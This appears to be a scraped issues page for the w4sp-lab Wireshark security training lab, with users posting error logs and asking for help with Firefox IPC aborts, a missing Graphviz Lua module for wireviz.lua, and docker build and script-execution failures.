###!!! [Child][MessageChannel] Error: (msgtype=0x3E0003,name=PCompositable::Msg_Destroy) Channel error: cannot send/recv
###!!! [Child][MessageChannel] Error: (msgtype=0x3E0003,name=PCompositable::Msg_Destroy) Channel error: cannot send/recv
###!!! [Child][MessageChannel] Error: (msgtype=0xE20003,name=PTexture::Msg_Destroy) Channel error: cannot send/recv
###!!! [Child][MessageChannel] Error: (msgtype=0xE20003,name=PTexture::Msg_Destroy) Channel error: cannot send/recv
###!!! [Child][MessageChannel] Error: (msgtype=0x3E0003,name=PCompositable::Msg_Destroy) Channel error: cannot send/recv
###!!! [Child][MessageChannel] Error: (msgtype=0xE20003,name=PTexture::Msg_Destroy) Channel error: cannot send/recv
###!!! [Child][MessageChannel] Error: (msgtype=0xE20003,name=PTexture::Msg_Destroy) Channel error: cannot send/recv
###!!! [Child][MessageChannel] Error: (msgtype=0x3E0003,name=PCompositable::Msg_Destroy) Channel error: cannot send/recv
[GFX1-]: Receive IPC close with reason=AbnormalShutdown
[Child 10015] WARNING: pipe error (3): Connection reset by peer: file /build/firefox-esr-XWSZH3/firefox-esr-52.2.0esr/ipc/chromium/src/chrome/common/ipc_channel_posix.cc, line 322
[Child 10015] ###!!! ABORT: Aborting on channel error.: file /build/firefox-esr-XWSZH3/firefox-esr-52.2.0esr/ipc/glue/MessageChannel.cpp, line 2152
[Child 10015] ###!!! ABORT: Aborting on channel error.: file /build/firefox-esr-XWSZH3/firefox-esr-52.2.0esr/ipc/glue/MessageChannel.cpp, line 2152
w4sp-lab@kali:/root/Downloads/w4sp-lab-master$ ...terminated.
I have the following error when i try to run the metasploitable image how can I solve it. Thanks !
Hello!
When I want to run the wirewiz.lua script for making some graph I had an error message - gv. lua can not found.
I've installed Graphviz, make some system environment PATH modification for Graphviz (as the software documentation mentioned it).
The error message:
c:\Program Files\Wireshark>tshark -q -X lua_script:wireviz.lua -i 9 > TEST.svg
tshark: Lua: Error during loading:
[string "wireviz.lua"]:2: module 'gv' not found:
no field package.preload['gv']
no file '\gv.lua'
no file 'C:\Users\peter\AppData\Roaming\Wireshark\plugins\gv.lua'
no file 'c:\Program Files\Wireshark\plugins\2.2.5\gv.lua'
no file 'C:\Users\peter\AppData\Roaming\Wireshark\plugins\cloudshark\gv.lua'
no file 'C:\Users\peter\AppData\Roaming\Wireshark\plugins\gv.lua'
no file 'c:\Program Files\Wireshark\plugins\2.2.5\gv.lua'
no file 'C:\Users\peter\AppData\Roaming\Wireshark\plugins\cloudshark\gv.lua'
(....)
I've tested it in Linux as well.
Could you give some hints how should I install Graphviz, or how should it work?
Many thanks for your help:
Peter
/home/w4sp-lab/Downloads/w4sp-lab-master/images
['docker', 'build', '-t', 'w4sp/labs:base', 'base']
['docker', 'build', '-t', 'w4sp/labs:vrrpd', 'vrrpd']
['docker', 'build', '-t', 'w4sp/labs:wireless', 'wireless']
['docker', 'build', '-t', 'w4sp/labs:temp', 'temp']
['docker', 'build', '-t', 'w4sp/labs:switch', 'switch']
^CTraceback (most recent call last):
File "w4sp_webapp.py", line 499, in
w4sp.docker_build('images/')
File "/home/w4sp-lab/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 102, in docker_build
r('docker build -t $image_name $image')
File "/home/w4sp-lab/Downloads/w4sp-lab-master/w4sp_app/utils.py", line 83, in r
return subprocess.check_output(cmd)
File "/usr/lib/python2.7/subprocess.py", line 217, in check_output
output, unused_err = process.communicate()
File "/usr/lib/python2.7/subprocess.py", line 475, in communicate
stdout = _eintr_retry_call(self.stdout.read)
File "/usr/lib/python2.7/subprocess.py", line 125, in _eintr_retry_call
return func(*args)
import-im6.q16: unable to open X server ' @ error/import.c/ImportImageCommand/358. import-im6.q16: unable to open X server ' @ error/import.c/ImportImageCommand/358.
import-im6.q16: unable to open X server ' @ error/import.c/ImportImageCommand/358. import-im6.q16: unable to open X server ' @ error/import.c/ImportImageCommand/358.
import-im6.q16: unable to open X server ' @ error/import.c/ImportImageCommand/358. import-im6.q16: unable to open X server ' @ error/import.c/ImportImageCommand/358.
import-im6.q16: unable to open X server ' @ error/import.c/ImportImageCommand/358. import-im6.q16: unable to open X server ' @ error/import.c/ImportImageCommand/358.
import-im6.q16: unable to open X server ' @ error/import.c/ImportImageCommand/358. import-im6.q16: unable to open X server ' @ error/import.c/ImportImageCommand/358.
from: too many arguments
./w4sp_webapp.py: line 17: syntax error near unexpected token (' ./w4sp_webapp.py: line 17: parser = argparse.ArgumentParser(description='Wireshark for Security Professionals Lab')'
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google ❤️ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.